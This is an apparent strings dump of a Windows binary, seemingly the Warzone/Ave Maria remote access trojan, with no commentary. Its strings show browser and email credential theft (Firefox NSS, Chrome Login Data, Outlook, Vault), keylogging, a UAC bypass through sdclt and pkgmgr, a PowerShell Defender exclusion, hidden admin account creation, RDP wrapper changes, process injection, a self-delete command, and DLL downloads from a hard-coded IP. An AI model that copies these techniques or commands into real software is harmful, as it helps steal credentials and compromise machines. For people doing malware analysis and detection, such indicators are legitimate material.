!This program cannot be run in DOS mode.
sRichQ
`.rdata
@.data
@.reloc
9^4tah
93tfVVVV
?vOj@_+
SVWj@R
PWWWWQ
PWh|n@
P;~,s&W
WSh+u@
WWWWWW
PVShh0A
SSSSSS
PVVVVV
PVh@aA
*WWWWWWWj
G$;C,u;
Sh }A
t+h$}A
VVVh06A
u3Sh }A
PSSSSSSh
f93trS
tG;HtsB
f99t,+
QQSVWQ
TSVjD3
RSSSSSSQ
w(9s t
9_Pt=Sh
VVVhTFA
PWVWWWSh
QQSVWj
QQVPQQ
WRhlGA
9\$\t
9\$8t;
127.0.0.2
abcdefghijklmnopqrstuvwxyzABCDEFGHIJK...
warzone160
USER32.DLL
MessageBoxA
Assert
An assertion condition failed
PureCall
A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application
GetRawInputData
ToUnicode
MapVirtualKeyA
SELECT * FROM logins
NSS_Init
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
NSSBase64_DecodeBuffer
PK11_CheckUserPassword
NSS_Shutdown
PK11_FreeSlot
PR_GetError
vaultcli.dll
VaultOpenVault
VaultCloseVault
VaultEnumerateItems
VaultGetItem
VaultFree
encryptedUsername
hostname
encryptedPassword
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_column_text
sqlite3_step
sqlite3_exec
sqlite3_open_v2
sqlite3_column_blob
sqlite3_column_type
sqlite3_column_bytes
sqlite3_close_v2
sqlite3_finalize
Storage
Accounts\Account.rec0
software\Aerofox\FoxmailPreview
Executable
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
%u.%u.%u.%u
AVE_MARIA
UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
ntdll.dll
RtlGetVersion
LdrLoadDll
RtlCreateUnicodeStringFromAsciiz
LdrGetProcedureAddress
RtlInitAnsiString
IsWow64Process
kernel32
VirtualQuery
cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
Software\Classes\Folder\shell\open\command
DelegateExecute
Settings not found !
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
\System32\cmd.exe
explorer.exe
powershell Add-MpPreference -ExclusionPath
find.exe
find.db
-w %ws -d C -f %s
Software\Microsoft\Windows\CurrentVersion\Internet Settings
MaxConnectionsPer1_0Server
MaxConnectionsPerServer
?lst@@YAXHJ@Z
.text$di
.text$mn
.text$yd
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.CRT$XCA
.CRT$XCU
.CRT$XCZ
.rsrc$01
.rsrc$02
CreateDirectoryW
GetModuleFileNameA
SetLastError
GetLastError
lstrcatW
CloseHandle
lstrlenW
ExpandEnvironmentStringsW
lstrlenA
lstrcmpA
lstrcatA
MultiByteToWideChar
lstrcpyA
WideCharToMultiByte
lstrcpyW
GetTickCount
lstrcmpW
HeapAlloc
GetProcessHeap
LoadLibraryA
GetProcAddress
ExitProcess
GetModuleHandleA
GetCommandLineA
GetStartupInfoA
HeapFree
VirtualFree
VirtualAlloc
HeapReAlloc
VirtualQuery
TerminateThread
CreateThread
WriteFile
CreateFileW
LoadLibraryW
GetLocalTime
GetCurrentThreadId
GetCurrentProcessId
ReadFile
FindFirstFileA
GetBinaryTypeW
FindNextFileA
GetFullPathNameA
GetTempPathW
GetPrivateProfileStringW
CreateFileA
GlobalAlloc
GetCurrentDirectoryW
SetCurrentDirectoryW
LocalFree
GetFileSize
FreeLibrary
WaitForSingleObject
GetCurrentProcess
WaitForMultipleObjects
CreatePipe
PeekNamedPipe
DuplicateHandle
SetEvent
CreateProcessW
CreateEventA
GetModuleFileNameW
LoadResource
FindResourceW
GetComputerNameW
LoadLibraryExW
FindFirstFileW
FindNextFileW
SetFilePointer
GetLogicalDriveStringsW
DeleteFileW
CopyFileW
GetDriveTypeW
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSection
DeleteCriticalSection
CreateMutexA
ReleaseMutex
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
VirtualProtectEx
CreateProcessA
SizeofResource
VirtualProtect
Wow64DisableWow64FsRedirection
GetSystemDirectoryW
Wow64RevertWow64FsRedirection
LockResource
GetWindowsDirectoryW
IsWow64Process
Process32First
WriteProcessMemory
Process32Next
GetWindowsDirectoryA
VirtualAllocEx
CreateRemoteThread
WinExec
GetTempPathA
KERNEL32.dll
wsprintfW
wsprintfA
GetLastInputInfo
GetWindowTextW
PostQuitMessage
GetKeyNameTextW
ToUnicode
TranslateMessage
RegisterRawInputDevices
DefWindowProcA
GetForegroundWindow
MapVirtualKeyA
GetRawInputData
RegisterClassW
SetWindowsHookExA
GetAsyncKeyState
CallNextHookEx
CreateWindowExW
DispatchMessageA
GetMessageA
GetKeyState
MessageBoxA
USER32.dll
RegQueryValueExW
RegOpenKeyExW
RegOpenKeyExA
RegEnumKeyExW
RegQueryValueExA
RegQueryInfoKeyW
RegCloseKey
OpenServiceW
ChangeServiceConfigW
QueryServiceConfigW
EnumServicesStatusExW
StartServiceW
RegSetValueExW
RegCreateKeyExA
OpenSCManagerW
CloseServiceHandle
GetTokenInformation
LookupAccountSidW
FreeSid
OpenProcessToken
AllocateAndInitializeSid
AdjustTokenPrivileges
LookupPrivilegeValueW
RegDeleteValueW
RegSetValueExA
RegCreateKeyExW
RegDeleteKeyW
InitializeSecurityDescriptor
RegDeleteKeyA
SetSecurityDescriptorDacl
ADVAPI32.dll
ShellExecuteW
SHGetFolderPathW
SHCreateDirectoryExW
SHGetSpecialFolderPathW
ShellExecuteExW
ShellExecuteExA
SHELL32.dll
URLDownloadToFileW
urlmon.dll
getaddrinfo
freeaddrinfo
WS2_32.dll
CoUninitialize
CoInitialize
CoCreateInstance
CoTaskMemFree
ole32.dll
PathFindExtensionW
PathFindFileNameW
PathCombineA
StrStrA
PathRemoveFileSpecA
StrStrW
PathFileExistsW
SHLWAPI.dll
NetLocalGroupAddMembers
NetUserAdd
NETAPI32.dll
OLEAUT32.dll
CryptStringToBinaryA
CryptUnprotectData
CRYPT32.dll
GetModuleFileNameExW
PSAPI.DLL
InternetCheckConnectionW
InternetQueryDataAvailable
InternetOpenUrlW
InternetOpenW
InternetCloseHandle
InternetReadFile
WININET.dll
PPPPPPPS
PPPPPPPS
PPPPPPPS
!This program cannot be run in DOS mode.
`.rdata
@.data
u*hh;@
VWh@"@
RtlGetCurrentPeb
RtlEnterCriticalSection
RtlLeaveCriticalSection
RtlInitUnicodeString
RtlFillMemory
NtAllocateVirtualMemory
LdrEnumerateLoadedModules
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
<servicing>
<package action="install">
<assemblyIdentity name="Package_1_for_KB929761" version="6.0.1.1" language="neutral" processorArchitecture="x86" publicKeyToken="31bf3856ad364e35"/>
<source location="%configsetroot%\Windows6.0-KB929761-x86.CAB" />
</package>
</servicing>
</unattend>
.text$mn
.idata$5
.00cfg
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
SizeofResource
WriteFile
GetModuleFileNameW
GetTempPathW
WaitForSingleObject
CreateFileW
GetSystemDirectoryW
lstrcatW
LockResource
CloseHandle
LoadLibraryW
LoadResource
FindResourceW
GetWindowsDirectoryW
GetProcAddress
ExitProcess
KERNEL32.dll
MessageBoxW
USER32.dll
SHCreateItemFromParsingName
ShellExecuteExW
SHELL32.dll
CoInitialize
CoUninitialize
CoCreateInstance
CoGetObject
ole32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
!This program cannot be run in DOS mode.
/Rich3
`.rdata
@.data
.reloc
.text$mn
.idata$5
.00cfg
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
GetStartupInfoW
ExpandEnvironmentStringsW
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
CloseHandle
ExitProcess
CreateProcessW
lstrcmpW
KERNEL32.dll
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
PathFindFileNameW
SHLWAPI.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
IsProcessorFeaturePresent
1)1E1U1[1n1
2(212<2C2c2i2o2u2{2
3.373F3
X0`0d0,181
0o1u1|1
2"2(2/262=2D2N2n2
;&;1;<;G;R;];h;
<!<@<Y<
6/7R7Y7r7
9&9J9P9
<*<8<J<
4"4=4t4
5#6b6v6
7K7[7|7
718C8^8e8
8)9;9B9N9U9o9v9
:=;D;R;[;
3)404$5Y5
=7=T=q=
=G>N>d>k>
>H?^?w?
193P3v3
3)5X7_7f7n7s7z7
8,838A8G8Q8
: :,:2:7:>:L:Q:]:
0E1"2*2H2
4/4A4F4L4T4a4
6.6L6S6
7&707:7D7a7k7u7
8 83888=8D8Q8V8[8
8#90959:9G9L9Q9^9c9m9
:':@:Y:f:l:{:
;5;@;E;T;`;t;
<D<a<r<
<)=C=[=e=
> >*>D>O>T>`>f>q>}>
0(1O1b1y1
3+313;3P3Z3u3
4!41494?4E4P4X4_4e4m4x4~4
5 505A5F5L5Q5W5a5g5l5z5
889C9W9a9j9u9
2A2H2c2
3&333j3
8>8W8d8
>2>e>M?
1+24292R2k2
3"3e3~3
3 4/4B4U4h4{4
5X6d6t6
7 7;7W7s7
8^9c9|9
:+:L:e:
=5>J>s>
030l1w1|1
2#2+22292@2G2N2
5)5b5l5
6-6T6]6r6
7+7H7R7k7x7
8$818>8
0_142E2
4&4,474=4H4N4Y4_4j4p4{4
5'5F5_5
5-626d6
7 7$7E7b7g7m7y7
8 8&8,868;8R8h8
= =$=+=6=d=j=
>">,>N>f>l>r>y>}>
1<1U1g1
1"222:2r2
4-5C5e5}5
868g8r8
8!9,9U9~9
===M={=
7#888P8[8l8
; <;</=W=
0R1_1l1
2 2*2B2M2l2
3-3;3B3I3
4!4,464@4G4
5#5N5X5g5r5w5
757S7[7v7
8A8X8_8p8
8;9F9W9^9
:G:R:p:
;";O;\;v;
>3>>>D>S>Y>c>i>m>
2 232B2_2|2]3y3
5&5Z7u7~7
:%:c:h:
;@;S;^;t;
;3<C<W<
>1?6?D?S?
0070p0u0
2'212;2
363@3O3U3d3
4 4*484=4B4G4L4
5(5<5V5]5m5t5
5d6p6w6}6
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686
0 0$0(0x5
5998#u
\Microsoft Vision\
User32.dll
ExplorerIdentifier
%02d-%02d-%02d_%02d.%02d.%02d
Unknow
{Unknown}
[ENTER]
[BKSP]
[CTRL]
[CAPS]
[INSERT]
\Google\Chrome\User Data\Default\Login Data
Software\Microsoft\Windows\CurrentVersion\App Paths\
http://www.google.com
http://5.206.225.104/dll/softokn3.dll
http://5.206.225.104/dll/msvcp140.dll
http://5.206.225.104/dll/mozglue.dll
http://5.206.225.104/dll/vcruntime140.dll
http://5.206.225.104/dll/freebl3.dll
http://5.206.225.104/dll/nss3.dll
softokn3.dll
msvcp140.dll
mozglue.dll
vcruntime140.dll
freebl3.dll
nss3.dll
msvcr120.dll
msvcp120.dll
Internet Explorer
Profile
firefox.exe
\firefox.exe
\Mozilla\Firefox\
profiles.ini
\logins.json
thunderbird.exe
\Thunderbird\
Could not decrypt
Account Name
POP3 Server
POP3 User
SMTP Server
POP3 Password
SMTP Password
HTTP Password
IMAP Password
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
TermService
%ProgramFiles%
%ProgramW6432%
\Microsoft DN1
\rdpwrap.ini
\sqlmap.dll
SeDebugPrivilege
SYSTEM\CurrentControlSet\Services\TermService\Parameters
ServiceDll
SYSTEM\CurrentControlSet\Services\TermService
ImagePath
svchost.exe
svchost.exe -k
CertPropSvc
SessionEnv
ServicesActive
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns
SYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip Redirector
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC
fDenyTSConnections
EnableConcurrentSessions
AllowMultipleTSSessions
RDPClip
@\cmd.exe
SOFTWARE\Microsoft\Cryptography
MachineGuid
ntdll.dll
Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\
InitWindows
Software\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\_rptls
Install
\System32\cmd.exe
WM_DSP
e\sdclt.exe
Mozilla/32.0 (compatible)
@Description
FriendlyName
Source
Grabber
WM_FIND
Asend.db
WM_DSP
ntdll.dll
Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
explorer.exe
\explorer.exe
WM_DISP
dismcore.dll
ellocnak.xml
\pkgmgr.exe
/n:%temp%\ellocnak.xml
Hey I'm Admin
WM_DISP
SOFTWARE\_rptls
Install
%systemroot%\system32\